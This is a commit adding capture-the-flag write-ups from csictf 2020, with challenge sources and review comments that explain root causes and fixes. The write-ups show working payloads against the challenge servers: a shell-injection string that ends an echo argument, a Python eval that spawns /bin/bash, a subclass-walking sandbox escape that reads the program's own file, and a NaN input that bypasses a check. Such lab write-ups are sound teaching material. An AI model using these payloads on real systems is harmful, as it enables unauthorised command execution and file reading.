rishitsaiya
4 years ago
11 changed files with 556 additions and 0 deletions
@ -0,0 +1,34 @@ |
|||||
|
## BroBot |
||||
|
The main idea finding the flag is just using Bot to get the flag. |
||||
|
|
||||
|
#### Step-1: |
||||
|
I tried `/about` to get information about the bot and got this: |
||||
|
|
||||
|
```python |
||||
|
CTF - https://ctf.csivit.com/ |
||||
|
Our Team - https://ctftime.org/team/77170/ |
||||
|
Homepage - https://csivit.com/ |
||||
|
Contribute - https://github.com/alias-rahil/speakingbot.git/ |
||||
|
CTF Support - https://discord.com/invite/9wHPB2B/ |
||||
|
BoT Support - @alias_rahil |
||||
|
``` |
||||
|
#### Step-2: |
||||
|
I used `/text2voice`. I linked to the source of the bot. It writes our text as `arg` for `echo` in a bash script. Then pipes the script's output to `espeak` to get the sound. |
||||
|
|
||||
|
#### Step-3: |
||||
|
I got this from [writeup](https://github.com/goswami-rahul/ctf/tree/master/csictf2020/brobot) to execute. |
||||
|
|
||||
|
```bash |
||||
|
fs = open(f"/home/ctf/{update.message.from_user.id}", "w") |
||||
|
fs.write(f"echo '{text}'") |
||||
|
fs.close() |
||||
|
os.system( |
||||
|
f"su ctf -c 'sh /home/ctf/{update.message.from_user.id} | espeak -w /home/ctf/{update.message.from_user.id}.wav --stdin'" |
||||
|
) |
||||
|
``` |
||||
|
|
||||
|
Then a simple `';cat flag.txt;'` gives us the answer. |
||||
|
|
||||
|
#### Step-4: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{ai_will_take_over_the_world}` |
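Review bot: Step-3 fences the bot's Python source (`fs = open(...)`, `os.system(...)`) as `bash`, and Step-1 fences the plain `/about` output as `python`; retag them as `python` and `text`. The write-up also gives the input `';cat flag.txt;'` without saying why it works: `fs.write(f"echo '{text}'")` writes the user's text unescaped between single quotes into a script that is then run with `sh`, so a quote in the text ends the `echo` argument. State that root cause, and that the fix is to hand the text to `espeak` on stdin without building a shell script from it. In Step-2, "I linked to the source" presumably means "I looked at the source".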
After Width: | Height: | Size: 18 KiB |
@ -0,0 +1,84 @@ |
|||||
|
## Escape Plan |
||||
|
The main idea finding the flag is just spawning into a sandbox. |
||||
|
|
||||
|
#### Step-1: |
||||
|
When we run `nc chall.csivit.com 30419`, we are greeted with, |
||||
|
|
||||
|
```bash |
||||
|
Welcome to cipher decoder, an open-source script in python! |
||||
|
|
||||
|
EXAMPLES: |
||||
|
shift_cipher_key('hello', 25) |
||||
|
shift_cipher_bruteforce('hello') |
||||
|
encrypt_vigenere('TEXT', 'KEY') |
||||
|
decrypt_vigenere('DIVD', 'KEY') |
||||
|
|
||||
|
Currently supported ciphers: |
||||
|
shift_cipher_key(text, shift) |
||||
|
shift_cipher_bruteforce(text) |
||||
|
encrypt_vigenere(plaintext, key) |
||||
|
decrypt_vigenere(ciphertext, key) |
||||
|
|
||||
|
To exit: |
||||
|
exit() |
||||
|
|
||||
|
I am constantly trying to make this cipher decoder better and more secure! Help me add support to more ciphers by submitting a PR! |
||||
|
Hope it helps you! |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
So to escape, I tried `eval('__import__("os").system("/bin/bash")')` and I was in. |
||||
|
|
||||
|
Once in I directly checked, `ls -al`, and I got this: |
||||
|
|
||||
|
```bash |
||||
|
total 20 |
||||
|
drwxr-x--- 1 root ctf 4096 Jul 22 06:35 . |
||||
|
drwxr-xr-x 1 root root 4096 Jul 26 16:58 .. |
||||
|
drwxr-x--- 1 root ctf 4096 Jul 22 06:27 .git |
||||
|
-rwxr-x--- 1 root ctf 2654 Jul 22 06:27 crypto.py |
||||
|
-rwxr-x--- 1 root ctf 52 Jul 22 06:27 start.sh |
||||
|
``` |
||||
|
|
||||
|
#### Step-3: |
||||
|
I checked other files, but I will stick to procedure here. Since the description involved a PR, I checked `.git` first by `cd .git`. I got usual files: |
||||
|
|
||||
|
```bash |
||||
|
COMMIT_EDITMSG |
||||
|
HEAD |
||||
|
config |
||||
|
description |
||||
|
hooks |
||||
|
index |
||||
|
info |
||||
|
logs |
||||
|
objects |
||||
|
packed-refs |
||||
|
refs |
||||
|
``` |
||||
|
At this point, I generally check `logs` to get an overview over the changes in the repo, but here the permission was denied. |
||||
|
|
||||
|
#### Step-4: |
||||
|
So, I checked config files by `cat config` and I got this: |
||||
|
|
||||
|
```bash |
||||
|
[core] |
||||
|
repositoryformatversion = 0 |
||||
|
filemode = true |
||||
|
bare = false |
||||
|
logallrefupdates = true |
||||
|
[remote "origin"] |
||||
|
url = https://github.com/alias-rahil/crypto-cli |
||||
|
fetch = +refs/heads/*:refs/remotes/origin/* |
||||
|
[branch "master"] |
||||
|
remote = origin |
||||
|
merge = refs/heads/master |
||||
|
``` |
||||
|
#### Step-4: |
||||
|
Now, I got a URL and checked at the given head and got the flag. |
||||
|
|
||||
|
<img src="Flag.png"> |
||||
|
|
||||
|
#### Step-5: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{2077m4y32_h45_35c4p3d}` |
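Review bot: There are two `#### Step-4:` headings (the `cat config` step and the "Now, I got a URL" step), so the sequence reads 1, 2, 3, 4, 4, 5; renumber the second to Step-5 and the flag step to Step-6. The last working step is documented only by `<img src="Flag.png">`: say in text where in https://github.com/alias-rahil/crypto-cli the flag was found, since "checked at the given head" does not identify it. Step-2 should state what it demonstrates, namely that the prompt accepted a Python expression containing `eval` and `__import__`, and the intro's "spawning into a sandbox" should read "escaping a sandbox".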
@ -0,0 +1,226 @@ |
|||||
|
## Friends |
||||
|
The main idea finding the flag is just parsing the input smartly. |
||||
|
|
||||
|
#### Step-1: |
||||
|
When we download `namo.py`, we are greeted with: |
||||
|
|
||||
|
```python |
||||
|
import math |
||||
|
import sys |
||||
|
|
||||
|
def fancy(x): |
||||
|
a = (1/2) * x |
||||
|
b = (1/2916) * ((27 * x - 155) ** 2) |
||||
|
c = 4096 / 729 |
||||
|
d = (b - c) ** (1/2) |
||||
|
e = (a - d - 155/54) ** (1/3) |
||||
|
f = (a + d - 155/54) ** (1/3) |
||||
|
g = e + f + 5/3 |
||||
|
return g |
||||
|
|
||||
|
def notfancy(x): |
||||
|
return x**3 - 5*x**2 + 3*x + 10 |
||||
|
|
||||
|
def mathStuff(x): |
||||
|
if (x < 3 or x > 100): |
||||
|
exit() |
||||
|
|
||||
|
y = fancy(notfancy(x)) |
||||
|
|
||||
|
if isinstance(y, complex): |
||||
|
y = float(y.real) |
||||
|
|
||||
|
y = round(y, 0) |
||||
|
return y |
||||
|
|
||||
|
print("Enter a number: ") |
||||
|
sys.stdout.flush() |
||||
|
x = round(float(input()), 0) |
||||
|
if x == mathStuff(x): |
||||
|
print('Fail') |
||||
|
sys.stdout.flush() |
||||
|
else: |
||||
|
print(open('namo.txt').read()) |
||||
|
sys.stdout.flush() |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
So I tried basic numbers and it worked according to the given algorithm but however, we could try a float `nan` and then I ran it along with the remote server to enter the `else` condition at the end. |
||||
|
|
||||
|
```bash |
||||
|
echo nan | nc chall.csivit.com 30425 |
||||
|
``` |
||||
|
Output: |
||||
|
|
||||
|
```bash |
||||
|
Enter a number: |
||||
|
Mitrooon |
||||
|
bhaiyo aur behno "Enter a number" |
||||
|
mann ki baat nambar |
||||
|
|
||||
|
agar nambar barabar 1 hai { |
||||
|
bhaiyo aur behno "s" |
||||
|
} |
||||
|
|
||||
|
nahi toh agar nambar barabar 13 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 15 hai { |
||||
|
bhaiyo aur behno "5" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 22 hai { |
||||
|
bhaiyo aur behno "4" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 28 hai { |
||||
|
bhaiyo aur behno "k" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 8 hai { |
||||
|
bhaiyo aur behno "y" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 17 hai { |
||||
|
bhaiyo aur behno "4" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 9 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 4 hai { |
||||
|
bhaiyo aur behno "t" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 3 hai { |
||||
|
bhaiyo aur behno "c" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 20 hai { |
||||
|
bhaiyo aur behno "r" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 12 hai { |
||||
|
bhaiyo aur behno "n" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 0 hai { |
||||
|
bhaiyo aur behno "c" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 23 hai { |
||||
|
bhaiyo aur behno "t" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 27 hai { |
||||
|
bhaiyo aur behno "0" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 10 hai { |
||||
|
bhaiyo aur behno "n" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 11 hai { |
||||
|
bhaiyo aur behno "4" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 7 hai { |
||||
|
bhaiyo aur behno "m" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 25 hai { |
||||
|
bhaiyo aur behno "c" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 24 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 6 hai { |
||||
|
bhaiyo aur behno "{" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 16 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 18 hai { |
||||
|
bhaiyo aur behno "_" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 2 hai { |
||||
|
bhaiyo aur behno "i" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 5 hai { |
||||
|
bhaiyo aur behno "f" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 19 hai { |
||||
|
bhaiyo aur behno "g" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 14 hai { |
||||
|
bhaiyo aur behno "1" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 21 hai { |
||||
|
bhaiyo aur behno "3" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 26 hai { |
||||
|
bhaiyo aur behno "0" |
||||
|
} |
||||
|
|
||||
|
|
||||
|
nahi toh agar nambar barabar 29 hai { |
||||
|
bhaiyo aur behno "}" |
||||
|
} |
||||
|
|
||||
|
nahi toh { |
||||
|
bhaiyo aur behno "" |
||||
|
} |
||||
|
|
||||
|
achhe din aa gaye |
||||
|
``` |
||||
|
|
||||
|
#### Step-3: |
||||
|
Simple substitution like 0=c, 1=s, 2=i in the context of flag like `csictf{`, would also work. Instead I got this script to get the flag. |
||||
|
|
||||
|
```bash |
||||
|
echo nan | nc chall.csivit.com 30425 | grep -A1 'hai {' | sed 's/agar nambar barabar //' | sed 's/nahi toh //' | sed 's/ hai {$/ =/' | sed 's/^\tbhaiyo aur behno \"//' | sed 's/\"$//' | sed 's/--//' | sed ':a;N;$!ba;s/=\n/ /g' | sort -n | uniq | awk '{print $2}' | tr -d '\n'; echo '' |
||||
|
``` |
||||
|
This is a 1 liner and we get the flag after this. |
||||
|
|
||||
|
#### Step-5: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{my_n4n_15_4_gr34t_c00k}` |
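Review bot: Step-2 sends `nan` but does not explain why it reaches the `else` branch. In `namo.py`, `x < 3 or x > 100` is False for NaN, so `mathStuff` does not exit, and `x == mathStuff(x)` is False because NaN never compares equal, which prints `namo.txt`; add that reasoning. The headings skip from Step-3 to Step-5, the server output is fenced as `bash`, and the one-liner in Step-3 would be easier to check if it were split across lines with a comment per stage (extract the `nambar`/character pairs, `sort -n` by index, join the characters).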
@ -0,0 +1,38 @@ |
|||||
|
import math |
||||
|
import sys |
||||
|
|
||||
|
def fancy(x): |
||||
|
a = (1/2) * x |
||||
|
b = (1/2916) * ((27 * x - 155) ** 2) |
||||
|
c = 4096 / 729 |
||||
|
d = (b - c) ** (1/2) |
||||
|
e = (a - d - 155/54) ** (1/3) |
||||
|
f = (a + d - 155/54) ** (1/3) |
||||
|
g = e + f + 5/3 |
||||
|
return g |
||||
|
|
||||
|
def notfancy(x): |
||||
|
return x**3 - 5*x**2 + 3*x + 10 |
||||
|
|
||||
|
def mathStuff(x): |
||||
|
if (x < 3 or x > 100): |
||||
|
exit() |
||||
|
|
||||
|
y = fancy(notfancy(x)) |
||||
|
|
||||
|
if isinstance(y, complex): |
||||
|
y = float(y.real) |
||||
|
|
||||
|
y = round(y, 0) |
||||
|
return y |
||||
|
|
||||
|
print("Enter a number: ") |
||||
|
sys.stdout.flush() |
||||
|
x = round(float(input()), 0) |
||||
|
if x == mathStuff(x): |
||||
|
print('Fail') |
||||
|
sys.stdout.flush() |
||||
|
else: |
||||
|
print(open('namo.txt').read()) |
||||
|
sys.stdout.flush() |
||||
|
|
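Review bot: The range check `if (x < 3 or x > 100):` does not reject NaN, since both comparisons are False, and `x == mathStuff(x)` is then also False, so the `else` branch prints `namo.txt`. If this file is the unmodified challenge source, say so in a header comment so it is not mistaken for fixed code; a corrected version would reject non-finite input with `math.isfinite(x)` before the comparison (`math` is imported but never used). `open('namo.txt').read()` also leaves the file handle to be closed by the garbage collector; a `with` block is cleaner.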
@ -0,0 +1,51 @@ |
|||||
|
## Machine Fix |
||||
|
The main idea finding the flag is just understanding the algorithm. |
||||
|
|
||||
|
#### Step-1: |
||||
|
|
||||
|
After I downloaded `code.py`, I tried to understand the workflow here: |
||||
|
|
||||
|
```python |
||||
|
def convert (n): |
||||
|
if n == 0: |
||||
|
return '0' |
||||
|
nums = [] |
||||
|
while n: |
||||
|
n, r = divmod(n, 3) |
||||
|
nums.append(str(r)) |
||||
|
return ''.join(reversed(nums)) |
||||
|
|
||||
|
count=0 |
||||
|
n=1 |
||||
|
while(n<=523693181734689806809285195318): |
||||
|
str1=convert(n) |
||||
|
str2=convert(n-1) |
||||
|
str2='0'*(len(str1)-len(str2))+str2 |
||||
|
for i in range(len(str1)): |
||||
|
if(str1[i]!=str2[i]): |
||||
|
count+=1 |
||||
|
n+=1 |
||||
|
|
||||
|
print(count) |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
For every number n, n and n - 1 are converted to base 3 & then, the program compare the digits, the number of differences is added to total. |
||||
|
|
||||
|
So I wrote a simple `flag.py` script to get flag: |
||||
|
|
||||
|
```python |
||||
|
def flag(n): |
||||
|
sum = 0 |
||||
|
while (n > 0): |
||||
|
sum += n |
||||
|
n //= 3 |
||||
|
return sum |
||||
|
|
||||
|
print(flag(523693181734689806809285195318)) |
||||
|
``` |
||||
|
On running it by `python3 flag.py` |
||||
|
|
||||
|
#### Step-3: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{785539772602034710213927792950}` |
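Review bot: Step-2 goes from describing the digit comparison straight to `flag.py` without the step that connects them. Incrementing n-1 to n changes k+1 base-3 digits, where 3^k is the highest power of 3 dividing n, so digit position i changes once per multiple of 3^i and the total up to N is N + N//3 + N//9 + ..., which is what the `while (n > 0)` loop sums; state that. Also, "On running it by `python3 flag.py`" is an unfinished sentence: show the printed number so the flag in Step-3 can be checked against it.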
@ -0,0 +1,21 @@ |
|||||
|
def convert (n): |
||||
|
if n == 0: |
||||
|
return '0' |
||||
|
nums = [] |
||||
|
while n: |
||||
|
n, r = divmod(n, 3) |
||||
|
nums.append(str(r)) |
||||
|
return ''.join(reversed(nums)) |
||||
|
|
||||
|
count=0 |
||||
|
n=1 |
||||
|
while(n<=523693181734689806809285195318): |
||||
|
str1=convert(n) |
||||
|
str2=convert(n-1) |
||||
|
str2='0'*(len(str1)-len(str2))+str2 |
||||
|
for i in range(len(str1)): |
||||
|
if(str1[i]!=str2[i]): |
||||
|
count+=1 |
||||
|
n+=1 |
||||
|
|
||||
|
print(count) |
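Review bot: The loop `while(n<=523693181734689806809285195318):` needs about 5.2e29 iterations, each calling `convert` twice, so this file cannot run to completion. Add a header comment saying it is the original challenge code kept for reference and that `flag.py` computes the same count directly. Style: `def convert (n):` has a stray space before the parenthesis, and `str2=convert(n-1)` recomputes the value `str1` held on the previous iteration.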
@ -0,0 +1,8 @@ |
|||||
|
def flag(n): |
||||
|
sum = 0 |
||||
|
while (n > 0): |
||||
|
sum += n |
||||
|
n //= 3 |
||||
|
return sum |
||||
|
|
||||
|
print(flag(523693181734689806809285195318)) |
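Review bot: `sum = 0` shadows the built-in `sum` inside `flag`; rename it to `total`. The function has no docstring, so nothing says that it returns n + n//3 + n//9 + ... or why that equals the count printed by `code.py`; add a line for each. The limit 523693181734689806809285195318 is repeated from `code.py` as a bare literal; a named constant would make the link explicit.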
After Width: | Height: | Size: 156 KiB |
@ -0,0 +1,15 @@ |
|||||
|
## No DIStractions |
||||
|
The main idea finding the flag is getting the flag from Discord Bot. |
||||
|
|
||||
|
#### Step-1: |
||||
|
|
||||
|
The tag `Discord` clearly implies that you have to check something out there. So, I went to misc channel and checked out this bot called `Kuwu`. |
||||
|
|
||||
|
#### Step-2: |
||||
|
After trying `flag`, `./flag`, etc., it worked on `.flag`. |
||||
|
|
||||
|
<img src ="Flag.png"> |
||||
|
|
||||
|
#### Step-3: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{m0r3_huMaN_than_Y0u}` |
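Review bot: Step-2's result exists only in `<img src ="Flag.png">`, which has no `alt` text; quote the bot's reply to `.flag` in the write-up so the step survives without the image. Step-1 should also say which server's misc channel the `Kuwu` bot was in, since "went to misc channel" assumes the reader already knows.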
@ -0,0 +1,79 @@ |
|||||
|
## Prison Break |
||||
|
The main idea finding the flag is just escaping Python Sandbox. |
||||
|
|
||||
|
#### Step-1: |
||||
|
After I ran `nc chall.csivit.com 30407`, we get this a python sandbox. |
||||
|
|
||||
|
I tried various commands like flag and ctf and all, but nothing worked. |
||||
|
|
||||
|
#### Step-2: |
||||
|
Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/ |
||||
|
|
||||
|
#### Step-3: |
||||
|
There I got this 1 liner to escape the sandbox. |
||||
|
|
||||
|
**Payload:** |
||||
|
```python |
||||
|
print(().__class__.__bases__[0].__subclasses__()[40](__file__).read()) |
||||
|
``` |
||||
|
|
||||
|
I got the source code, which had the flag. |
||||
|
|
||||
|
```python |
||||
|
#!/usr/bin/python |
||||
|
|
||||
|
import sys |
||||
|
|
||||
|
class Sandbox(object): |
||||
|
def execute(self, code_string): |
||||
|
exec(code_string) |
||||
|
sys.stdout.flush() |
||||
|
|
||||
|
sandbox = Sandbox() |
||||
|
|
||||
|
_raw_input = raw_input |
||||
|
|
||||
|
main = sys.modules["__main__"].__dict__ |
||||
|
orig_builtins = main["__builtins__"].__dict__ |
||||
|
|
||||
|
builtins_whitelist = set(( |
||||
|
#exceptions |
||||
|
'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception', |
||||
|
|
||||
|
#constants |
||||
|
'False', 'None', 'True', |
||||
|
|
||||
|
#types |
||||
|
'basestring', 'bytearray', 'bytes', 'complex', 'dict', |
||||
|
|
||||
|
#functions |
||||
|
'abs', 'bin', 'dir', 'help' |
||||
|
|
||||
|
# blocked: eval, execfile, exit, file, quit, reload, import, etc. |
||||
|
)) |
||||
|
|
||||
|
for builtin in orig_builtins.keys(): |
||||
|
if builtin not in builtins_whitelist: |
||||
|
del orig_builtins[builtin] |
||||
|
|
||||
|
print("Find the flag.") |
||||
|
sys.stdout.flush() |
||||
|
|
||||
|
def flag_function(): |
||||
|
flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}" |
||||
|
|
||||
|
while 1: |
||||
|
try: |
||||
|
sys.stdout.write(">>> ") |
||||
|
sys.stdout.flush() |
||||
|
code = _raw_input() |
||||
|
sandbox.execute(code) |
||||
|
|
||||
|
except Exception: |
||||
|
print("You have encountered an error.") |
||||
|
sys.stdout.flush() |
||||
|
``` |
||||
|
|
||||
|
#### Step-4: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}` |
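Review bot: Step-3 gives the payload without saying why it gets past the filter shown in the recovered source. The source only deletes names from `__builtins__` that are not in `builtins_whitelist`, while the payload looks up none of the deleted names: it walks `().__class__.__bases__[0].__subclasses__()` to reach a type and calls it on `__file__`. Add that explanation, and note that the index `[40]` is interpreter-specific (the source uses `raw_input` and `basestring`, so Python 2), so the takeaway for readers is that deleting builtin names is not a sandbox boundary. In Step-1, "we get this a python sandbox" needs fixing, and it is worth pointing out that `flag_function` in the source is defined but never called.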